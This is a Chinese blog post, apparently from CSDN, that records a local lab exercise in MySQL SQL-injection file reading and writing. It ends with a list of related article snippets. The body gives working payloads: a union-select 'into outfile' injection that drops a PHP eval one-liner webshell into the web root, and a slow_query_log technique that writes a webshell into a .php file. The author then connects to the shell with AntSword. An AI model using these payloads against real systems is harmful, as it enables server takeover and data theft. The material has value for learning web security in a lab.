sql 读写注入

最新推荐文章于 2024-05-20 10:00:15 发布
最新推荐文章于 2024-05-20 10:00:15 发布
阅读量496 收藏 8
点赞数 11
文章标签: sql java 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/134804362
版权

root高权限读写注入

load_file 读取文件

 

大姐我真是整了半天都是nullnullnull缝子

结果看了半天这个my.ini是被隐藏的大哥

load_file()读取文件结果为null_mysql load_file返回null解决办法_黑小薛的博客-CSDN博客 

终于读出来了

此时参数值系统变量 secure_file_priv已经被修改

原本此处变量值为 NULL,即没设置允许操作的目录,所以没法导出到文件。

这个变量就可以用来限制操作路径

into_outfile 写入文件

?param=0' union select 1,2,3,4,'a' into outfile 'e:/2.txt'--+

我们可以看到2.txt被写入

我们可以写入一句话木马

?param=0' union select 1,2,3,4,'<?php eval($_POST[a]);?>' into outfile 'D:/phpstudy_pro/WWW/c.php'--+

先检查一下是否上传成功

用蚁剑发现连接成功了v

太搞笑了连接自己

 

那么如果把my.ini内的参数secure_file_priv设置在c盘目录下

secure_file_priv=c:/

我们可以发现我们就只能在c盘进行操作

mysql写马

set global slow_query_log=1;


set global slow_query_log_file='D:\\phpstudy_pro\\WWW\d.php'

D:\\phpstudy_pro\\WWW\d.php---------》shell路径

可以看到有了d.php

select '<?php eval($ POST[a])?>' or SLEEP(1);

但是!!!

我发现如果sleep的少,并不会记录到日志中去

要sleep的久一点

Mysql注入写Shell读文件总结 - FreeBuf网络安全行业门户

select "<?php eval($_POST[aaaaaa]);?>" or sleep(11);

 

可以看一下我们的日志d.php

因为尝试了很多次。。所以有很多

我们可以发现都是sleep(11)的被记录了

蚁剑连一下看看

 

 

木…
关注
  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于SQL注入中文件读写的方法总结
09-09
主要给大家介绍了关于SQL注入中文件的读写方法,文中通过示例代码介绍的非常详细,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。
SQL注入读写文件
weixin_43765321的博客
03-02 3608
1. 读写文件的基本条件和使用 1.1 SQL注入文件读写 SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要目的在于获取webshell或盗取重要文件。 1.2 文件读写的基本条件 当前用户权限对该文件可读。 文件在该服务器上。 路径完整。 文件大小小于max_sllowed_packet。 当前数据库用户有FILE权限,File_priv为yes secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作。 在MySQL5.5.53中,File_priv默认
WEB攻防-通用漏洞&SQL读写注入&ACCESS偏移注入&MYSQL&MSSQL&PostgreSQL
m0_65336233的博客
10-08 368
WEB攻防-通用漏洞&SQL读写注入&ACCESS偏移注入&MYSQL&MSSQL&PostgreSQL
day25WEB攻防-通用漏洞&SQL读写注入&MYSQL&SqlServer&PostgreSQL
m0_69583059的博客
01-15 1035
Access无高权限注入点,只能猜解,还是暴力猜解MYSQL,PostgreSQL,MSSQL高权限注入点可以升级读写执行等,高权限注入可以通过写入后门或者读取相关配置文件获取当前网站的相关权限,不需要通过一步一步猜解数据,当然这只是里理论,在实际环境中,可能会因为数据库的某些设置或者防护导致无法读写注入,如果能绕过当然是最好的,如果不能绕过那么我们只能乖乖的一步一步猜解 读取文件:union select load_file('读取路径'),2,3 写入文件:union select '写入信息',2,
第25天:WEB攻防-通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL
wuqingsix的博客
11-17 299
Access无高权限注入点-只能猜解,还是暴力猜解 ,因为其中只有一个用户权限MYSQL,PostgreSQL,MSSQL高权限注入点-可升级读写执行等高权限由来:当前的脚本采用的是高权限用户链接的数据库,当前产生注入点的话就是高权限使用load_file()函数读取文件内容。
第二十五天:WEB攻防-通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL
m0_51322401的博客
01-31 574
分为盘符绝对路径和网址绝对路径盘符绝对路径:顾名思义如图:网址绝对路径:网址的路径,如下图-路径获取:phpinfo,报错,字典等-无法写入:secure_file_priv突破 注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过set global slow_query_log_file=‘shell路径’;select '
细说——SQL注入
LainWith的博客
10-09 7645
目录SQL是什么?什么是SQL注入漏洞原理漏洞原因为什么会有SQL注入注⼊点可能存在的位置漏洞危害提交方法判断注入点判断字符型还是数字型sql注入绕过获取网站路径SQL 注入读写文件1. 数据库支持文件读写2. 当前用户具有文件权限3. 知道文件绝对路径查询方式及报错盲注⭐查询方式报错盲注报错注入函数二次注入原理实施步骤举例堆叠查询DNSlog脑图常见数据库,及注入相关⭐注释符、数据库端口数据库文件后缀名特有的数据库查看当前用户或权限ASCII转换函数不同数据库注入结果的区别⭐Sql注入中连接字符串常用函数
SQL注入-13】利用SQL注入漏洞读写文件案例
m0_64378913的博客
05-08 1859
目录1 读写文件的前提条件1.1 secure-file-priv参数1.1.1 作用1.1.2 secure-file-priv参数值的查看1.1.2.1 远程查看1.1.2.2 本地查看1.1.3 secure-file-priv参数值的更改1.2 当前用户具有文件权限1.3 需要知道文件的绝对路径2 读取和写入文件2.1 读取文件2.2 写入文件3 读取和写入文件具体实例3.1 操作环境3.2 操作步骤3.2.1 判断注入点与注入类型3.2.2 判断回显列数和回显位置3.2.3 获取数据库
SQL注入攻击介绍
热门推荐
99度灰的博客
03-30 2万+
SQL注入攻击介绍 一、SQL注入攻击简介 SQL注入攻击是指,后台数据库操作时,如果拼接外部参数到SQL语句中,就可能导致欺骗服务器执行恶意的SQL语句,造成数据泄露、删库、页面篡改等严重后果。按变量类型分为:数字型、字符型;按HTTP提交方式分为:GET注入、POST注入、Cookie注入;按注入方式分为:报错注入、盲注(布尔盲注、时间盲注)、堆叠注入等等。 二、SQL注入分类 按变量类型分类:如SQL语句为select *from user where param=1(数字型)、select *fr
sql注入之高权限注入和文件读写
小阿宁的猫猫
09-12 689
高权限注入-- 1.多个网站共享mysql服务器-- 2.MySQL 权限介绍-- 3.注入流程-- 查询所有数据库名称-- 查询表名对应的字段名-- 查询数据-- 文件读写-- 1.文件读写注入的原理-- 2.文件读写注入的条件-- 3.读取文件-- 4.写入文件--
SQL 注入读写文件
Cwillchris的博客
06-04 782
SQL读写文件原理超详细讲解
Web安全SQL注入精讲视频.zip
04-16
2-10 SQL注入读写文件.mp4 2-2 字符型注入(单引号、双引号、括号).mp4 2-3 POST注入.mp4 2-4 报错注入.mp4 2-5 双注入.mp4 2-6 布尔盲注.mp4 2-7 时间盲注.mp4 2-8 Cookie注入.mp4 2-9 HTTP-Referer注入.mp4 3-1 ...
在OneProxy的基础上实行MySQL读写分离与负载均衡
12-16
 OneProxy平民软件完全自主开发的分布式数据访问层,帮助用户在MySQL/PostgreSQL集群上快速搭建支持分库分表的分布式数据库中间件,也是一款具有SQL白名单(防SQL注入)及IP白名单功能的SQL防火墙软件。采用与MySQL...
数据库——玩转SQL语句(以MySQL为例)
12-14
文章目录一、前言二、插入数据、删除数据、更新数据2.1 ...关于SQL语句的学习,有三个阶段。 第一阶段:懂 SQL 语句,能够根据业务需求实现 CRUD 功能; 第二阶段:懂数据库的基本原理、索引原理,能够定位分析数据库
Mysql注入中的outfile、dumpfile、load_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们...
sql去除表中某个字段的空格
最新发布
HelloWorld的专栏
05-20 52
比如表中名字字段,名字之间有空格,需要把空格去除,应该如何写SQL语句实现?函数来去除字符串两端的空格,如果需要去除字段中的所有空格,可以使用。以下是一个示例,假设我们有一个名为。的表,并且我们想要去除。在SQL中,可以使用。
Oracle数据库之PL/SQL基本语法(八)
pursue_mony的博客
05-14 114
PL/SQL 是 Oracle 数据库中使用的过程化 SQL 语言扩展,它允许你在 SQL 语句中嵌入控制结构、变量声明、异常处理等。用于在 PL/SQL 块中输出调试信息。为了看到这些信息,你需要在 SQL*Plus 或其他客户端中启用它(例如,使用。PL/SQL 代码通常被组织在块(block)中。一个块包含三个部分:声明部分、执行部分和异常处理部分。包是 PL/SQL 中一种将逻辑、变量、常量、游标、类型、子程序、异常等组合在一起的数据库对象。在 PL/SQL 中,你可以在。部分来处理运行时错误。
SQL——SERVER的建表的基础知识
m0_74012211的博客
05-15 1316
SQL——SERVER的基本建表操作
SQL的心得
weixin_64842400的博客
05-11 610
接着,系统按照 GROUP BY 子句中的指定字段分组,并对每个分组进行计算,生成虚拟的分组结果表。执行顺序 :from > on > where > group by > having > select > distinct > order by > top。4、聚合函数本质:对指定的列进行聚合,如果我们用了group by,我们可以对每个分组应用内聚合函数。在分组内部,聚合函数会自动处理所有重复的行。具体来说,在执行 SELECT 子句时,系统先计算 SELECT 中的列表达式和函数等,然后。
sql注入 文件读写
09-23
SQL注入是一种攻击技术,它利用应用程序对用户输入的不正确处理而使攻击者能够执行恶意的SQL语句。当应用程序未正确验证、过滤或转义用户输入时,攻击者可以将恶意的SQL代码插入到应用程序的数据库查询中。通过注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值